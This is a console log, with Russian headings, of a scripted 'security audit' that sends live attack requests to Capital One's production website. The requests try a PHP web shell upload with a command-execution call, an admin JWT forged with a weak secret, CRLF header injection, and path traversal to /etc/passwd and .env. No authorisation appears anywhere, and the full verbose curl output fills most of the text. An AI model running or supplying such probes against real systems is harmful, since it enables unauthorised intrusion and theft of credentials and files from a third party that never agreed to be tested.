=== УЛЬТИМАТИВНАЯ ПРОВЕРКА БЕЗОПАСНОСТИ ===
=== Проверка File Upload ===
Команда: curl -v -X POST "https://www.capitalone.com/api/upload" -F "file=@evil.php"
Note: Unnecessary use of -X or --request, POST is already inferred.
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [78 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/upload
* [HTTP/2] [1] [:method: POST]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/upload]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
* [HTTP/2] [1] [content-length: 243]
* [HTTP/2] [1] [content-type: multipart/form-data; boundary=------------------------zBBrxkxYPXsw5Cq64ulafw]
} [5 bytes data]
> POST /api/upload HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> Content-Length: 243
> Content-Type: multipart/form-data; boundary=------------------------zBBrxkxYPXsw5Cq64ulafw
> 
} [5 bytes data]
* We are completely uploaded and fine
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/upload/
< expires: Sat, 21 Jun 2025 07:35:17 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:17 GMT
< set-cookie: TLTUID=5C0263D799035C5F521A1F0A8B6BA459; expires=Thu, 20-Jun-2030 07:35:17 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=5D1BFDBE3BE2468E46AF91B9BD924F84; expires=Sat, 21-Jun-2025 09:35:17 GMT; path=/; domain=.capitalone.com; secure
< 
{ [5 bytes data]
100   243    0     0  100   243      0   2117 --:--:-- --:--:-- --:--:--  2131
* Connection #0 to host www.capitalone.com left intact

Команда: curl -v "https://www.capitalone.com/uploads/evil.php?cmd=id"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/uploads/evil.php?cmd=id
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /uploads/evil.php?cmd=id]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /uploads/evil.php?cmd=id HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0< HTTP/2 404 
< accept-ranges: bytes
< content-length: 100
< content-type: text/html
< etag: "d4bf94aec16315618161101efa9d048d:1666125989.803706"
< last-modified: Mon, 26 Sep 2022 16:43:26 GMT
< server: AkamaiNetStorage
< expires: Sat, 21 Jun 2025 07:35:19 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:19 GMT
< 
{ [5 bytes data]
100   100  100   100    0     0     80      0  0:00:01  0:00:01 --:--:--    80
* Connection #0 to host www.capitalone.com left intact
<html><head><meta http-equiv="refresh" content="0; url=/page-not-found/"></head><body></body></html>


=== Проверка слабого JWT ===
Команда: python3 -c "import jwt; print(jwt.encode({'user':'admin'}, 'secret', algorithm='HS256'))"
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.LmuLCvLRfzvDVYK_iUBmwL3-5K9N0QLFrHwhXVb5TPU

Команда: curl -v -H "Authorization: Bearer $(python3 -c "import jwt; print(jwt.encode({'user':'admin'}, 'secret', algorithm='HS256'))") "https://www.capitalone.com/api/admin"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/admin
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/admin]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
* [HTTP/2] [1] [authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.LmuLCvLRfzvDVYK_iUBmwL3-5K9N0QLFrHwhXVb5TPU]
} [5 bytes data]
> GET /api/admin HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.LmuLCvLRfzvDVYK_iUBmwL3-5K9N0QLFrHwhXVb5TPU
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/admin/
< expires: Sat, 21 Jun 2025 07:35:20 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:20 GMT
< set-cookie: TLTUID=40DADCE1B9DE5E89306A644D07E7CA01; expires=Thu, 20-Jun-2030 07:35:20 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=4B7E972C3C938E7707F8574029DF49CE; expires=Sat, 21-Jun-2025 09:35:20 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact



=== Проверка CRLF Injection ===
Команда: curl -v "https://www.capitalone.com/redirect?url=https://example.com%0d%0aX-Malicious:header"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.58, 92.123.103.82
*   Trying 92.123.103.58:443...
* Connected to www.capitalone.com (92.123.103.58) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [78 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/redirect?url=https://example.com%0d%0aX-Malicious:header
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /redirect?url=https://example.com%0d%0aX-Malicious:header]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /redirect?url=https://example.com%0d%0aX-Malicious:header HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/redirect/?url=https://example.com%0d%0aX-Malicious:header
< expires: Sat, 21 Jun 2025 07:35:20 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:20 GMT
< set-cookie: TLTUID=6AAA01C8124B0DEF15B3554A6E5B037F; expires=Thu, 20-Jun-2030 07:35:20 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=EC2DA33A08F970F97637F26C586F1F8C; expires=Sat, 21-Jun-2025 09:35:20 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact

Команда: curl -v "https://www.capitalone.com/redirect?url=https://example.com%0d%0aX-XSS-Protection:0"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.58, 92.123.103.82
*   Trying 92.123.103.58:443...
* Connected to www.capitalone.com (92.123.103.58) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/redirect?url=https://example.com%0d%0aX-XSS-Protection:0
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /redirect?url=https://example.com%0d%0aX-XSS-Protection:0]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /redirect?url=https://example.com%0d%0aX-XSS-Protection:0 HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/redirect/?url=https://example.com%0d%0aX-XSS-Protection:0
< expires: Sat, 21 Jun 2025 07:35:20 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:20 GMT
< set-cookie: TLTUID=EF3299A8A8C440B7B2C55DBA61FFF4C8; expires=Thu, 20-Jun-2030 07:35:20 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=4DE369AD71A3A2A0C6AEB76AF1CADED2; expires=Sat, 21-Jun-2025 09:35:20 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact



=== Проверка Directory Traversal ===
Команда: curl -v "https://www.capitalone.com/api/files?name=../../etc/passwd"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [80 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/files?name=../../etc/passwd
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/files?name=../../etc/passwd]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /api/files?name=../../etc/passwd HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/files/?name=../../etc/passwd
< expires: Sat, 21 Jun 2025 07:35:20 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:20 GMT
< set-cookie: TLTUID=4B7B5ED588FA53AF3B1918696D6DA1B2; expires=Thu, 20-Jun-2030 07:35:20 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=6FC7EA46771B3112AC726BD94F8BF7B3; expires=Sat, 21-Jun-2025 09:35:20 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact

Команда: curl -v "https://www.capitalone.com/api/files?name=../../.env"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [78 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/files?name=../../.env
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/files?name=../../.env]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /api/files?name=../../.env HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/files/?name=../../.env
< expires: Sat, 21 Jun 2025 07:35:20 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Sat, 21 Jun 2025 07:35:20 GMT
< set-cookie: TLTUID=FCEFCBE6F307EAC6CE84714ECB5EC6FD; expires=Thu, 20-Jun-2030 07:35:20 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=9157BD3E712845EF70D8BC3B6AC6351F; expires=Sat, 21-Jun-2025 09:35:20 GMT; path=/; domain=.capitalone.com; secure
< 
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact



=== АУДИТ ЗАВЕРШЁН. РЕЗУЛЬТАТЫ В capitalone_security_audit_2.txt ===
